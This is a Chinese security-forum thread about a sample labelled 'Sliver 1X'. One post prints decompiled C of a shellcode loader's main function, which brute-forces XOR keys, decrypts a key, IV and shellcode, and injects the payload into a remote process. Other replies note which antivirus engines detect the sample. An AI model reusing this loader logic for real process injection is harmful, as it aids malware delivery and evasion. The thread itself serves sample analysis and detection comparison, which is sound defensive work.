Sliver 1X

显示全部楼层 · 发表于 2025-1-24 15:33:34

人家写的很清楚了。
int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // ebx
  signed int i; // edi
  __m128 si128; // xmm3
  _DWORD *v7; // rax
  unsigned int v8; // edx
  __m128i v9; // xmm0
  __m128i v10; // xmm0
  unsigned int v11; // ecx
  __m128 v12; // xmm0
  signed int j; // edi
  _DWORD *v14; // rax
  __m128i v15; // xmm0
  __m128i v16; // xmm0
  unsigned int v17; // ecx
  __m128 v18; // xmm0
  HANDLE ProcessHeap; // rax
  __m128i *v20; // r15
  __int64 v21; // rdx
  __m128i *v22; // rdi
  __int128 *v23; // rsi
  signed __int64 v24; // rbx
  unsigned __int64 v25; // rbp
  __int64 v26; // r14
  __int128 v27; // xmm6
  __m128i *v28; // rax
  __int64 v29; // r8
  __int64 v30; // [rsp+30h] [rbp-168h] BYREF
  __m128i v31; // [rsp+40h] [rbp-158h]
  HANDLE Process; // [rsp+50h] [rbp-148h] BYREF
  HANDLE Thread; // [rsp+58h] [rbp-140h] BYREF
  __int128 v34[16]; // [rsp+60h] [rbp-138h] BYREF

  v3 = 0;
  Process = 0i64;
  Thread = 0i64;
  v30 = 0i64;
  if ( !(unsigned int)sub_140002C60(*(__int64 *)&argc, (__int64)argv, (__int64)&Process, (__int64)&Thread) )
return -1;
  GetProcessId(Process);
  sub_140002790("[+] Process ID: %d \n");
  GetThreadId(Thread);
  sub_140002790("[+] Thread ID: %d\n");
  sub_140002790("[+] Delaying Execution and Decrypting Keys ... \n");
  for ( i = 0; i <= 255; ++i )
  {
if ( (i ^ (unsigned __int8)byte_1400070C1) % 255 == 0xE2 )
   break;
  }
  si128 = (__m128)_mm_load_si128((const __m128i *)&xmmword_1400059C0);
  v7 = &unk_1400070C4;
  v8 = 0;
  v9 = (__m128i)_mm_and_ps((__m128)_mm_shuffle_epi32(_mm_cvtsi32_si128(i), 0), si128);
  v10 = _mm_packus_epi16(v9, v9);
  v31 = _mm_packus_epi16(v10, v10);
  v11 = v31.m128i_i32[0];
  do
  {
v12 = (__m128)_mm_cvtsi32_si128(*(v7 - 1));
v7 += 4;
v8 += 16;
*(v7 - 5) = _mm_cvtsi128_si32((__m128i)_mm_xor_ps((__m128)_mm_cvtsi32_si128(v11), v12));
*(v7 - 4) = _mm_cvtsi128_si32((__m128i)_mm_xor_ps(
                                          (__m128)_mm_cvtsi32_si128(*(v7 - 4)),
                                          (__m128)_mm_cvtsi32_si128(v11)));
*(v7 - 3) = _mm_cvtsi128_si32((__m128i)_mm_xor_ps(
                                          (__m128)_mm_cvtsi32_si128(v11),
                                          (__m128)_mm_cvtsi32_si128(*(v7 - 3))));
*(v7 - 2) = _mm_cvtsi128_si32((__m128i)_mm_xor_ps(
                                          (__m128)_mm_cvtsi32_si128(v11),
                                          (__m128)_mm_cvtsi32_si128(*(v7 - 2))));
  }
  while ( v8 < 0x20 );
  if ( (_BYTE)i )
  {
for ( j = 0; j <= 255; ++j )
{
   if ( (j ^ (unsigned __int8)byte_1400070E1) % 255 == 0xAE )
      break;
}
v14 = &unk_1400070E4;
v15 = (__m128i)_mm_and_ps((__m128)_mm_shuffle_epi32(_mm_cvtsi32_si128(j), 0), si128);
v16 = _mm_packus_epi16(v15, v15);
v31 = _mm_packus_epi16(v16, v16);
v17 = v31.m128i_i32[0];
do
{
   v18 = (__m128)_mm_cvtsi32_si128(*(v14 - 1));
   v14 += 4;
   v3 += 16;
   *(v14 - 5) = _mm_cvtsi128_si32((__m128i)_mm_xor_ps((__m128)_mm_cvtsi32_si128(v17), v18));
   *(v14 - 4) = _mm_cvtsi128_si32((__m128i)_mm_xor_ps(
                                             (__m128)_mm_cvtsi32_si128(v17),
                                             (__m128)_mm_cvtsi32_si128(*(v14 - 4))));
   *(v14 - 3) = _mm_cvtsi128_si32((__m128i)_mm_xor_ps(
                                             (__m128)_mm_cvtsi32_si128(v17),
                                             (__m128)_mm_cvtsi32_si128(*(v14 - 3))));
   *(v14 - 2) = _mm_cvtsi128_si32((__m128i)_mm_xor_ps(
                                             (__m128)_mm_cvtsi32_si128(v17),
                                             (__m128)_mm_cvtsi32_si128(*(v14 - 2))));
}
while ( v3 < 0x10 );
if ( (_BYTE)j )
{
   sub_140002790("[+] Done with Decryption\n");
   memset(v34, 0, sizeof(v34));
   ProcessHeap = GetProcessHeap();
   v20 = (__m128i *)HeapAlloc(ProcessHeap, 8u, 0x500ui64);
   if ( v20 )
   {
      memset(v34, 0, sizeof(v34));
      sub_140001C50((__int64)v34);
      v22 = v20;
      v23 = (__int128 *)&unk_1400070F0;
      v24 = (char *)&v34[15] - (char *)v20;
      v34[15] = unk_1400070E0;
      v25 = (unsigned __int64)&v20->m128i_u64[1] + 7;
      v26 = 80i64;
      do
      {
      v27 = *v23;
      sub_140001FD0(v34, v21, v22, v23);
      if ( v22 > (__m128i *)((char *)&v34[15] + 15) || v25 < (unsigned __int64)&v34[15] )
      {
         *(__m128 *)v22 = _mm_xor_ps((__m128)_mm_loadu_si128(v22), (__m128)v34[15]);
      }
      else
      {
         v28 = v22;
         v21 = 16i64;
         do
         {
            v28->m128i_i8[0] ^= v28->m128i_u8[v24];
            v28 = (__m128i *)((char *)v28 + 1);
            --v21;
         }
         while ( v21 );
      }
      ++v22;
      v34[15] = v27;
      v25 += 16i64;
      v24 -= 16i64;
      ++v23;
      --v26;
      }
      while ( v26 );
      sub_140002790("[i] Decrypting shellcode at: 0x%p \n");
      if ( (unsigned int)sub_1400027F0(Process, v20, v29, &v30) )
      {
      sub_140002790("[+] Payload is injected at: 0x%p \n");
      sub_140002790("[+] SUCCESSFULL PAYLOAD LAUNCH!!!!");
      return 0;
      }
      else
      {
      puts("[-] ERROR INJECTING PAYLOAD, PLEASE TRY AGAIN!");
      return -1;
      }
   }
   else
   {
      GetLastError();
      sub_140002790("[!] HeapAlloc Failed With Error: %d \n");
      puts("[-] COULD NOT DECRYPT THE SHELLCODE, PLEASE TRY AGAIN!");
      return -1;
   }
}
else
{
   puts("[-] COULD NOT DECRYPT THE IV, PLEASE TRY AGAIN!");
   return -1;
}
  }
  else
  {
puts("[-] COULD NOT DECRYPT THE KEY, PLEASE TRY AGAIN!");
return -1;
  }
}

显示全部楼层 · 发表于 2025-1-24 17:55:45

wowocock 发表于 2025-1-24 15:33
人家写的很清楚了。
int __cdecl main(int argc, const char **argv, const char **envp)
{

好家伙，直接puts

显示全部楼层 · 发表于 2025-1-24 23:09:41

腾讯电脑管家 1X

显示全部楼层 · 发表于 2025-1-25 14:39:12

瑞星 1x

显示全部楼层 · 发表于 2025-1-25 16:42:01

K7解压杀

[病毒样本] Sliver 1X

本帖子中包含更多资源

本帖子中包含更多资源